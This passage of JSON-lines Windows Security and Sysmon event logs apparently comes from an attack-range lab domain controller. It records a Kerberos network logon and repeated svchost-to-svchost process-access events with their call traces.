Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x64ad1","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 05:52:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220452,"ProcessID":864,"ThreadID":912,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x64AD1\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{433511B1-83A7-FED9-9147-785D15F197B0}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::3413:3332:6143:4f60\r\n\tSource Port:\t\t54928\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x64ad1","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{433511B1-83A7-FED9-9147-785D15F197B0}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::3413:3332:6143:4f60","IpPort":"54928","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4275,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.248\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.248","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4276,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.248\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.248","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4277,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.248\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.248","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4278,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.248\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.248","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4279,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.248\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.248","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4280,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.248\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.248","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4281,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.248\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.248","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 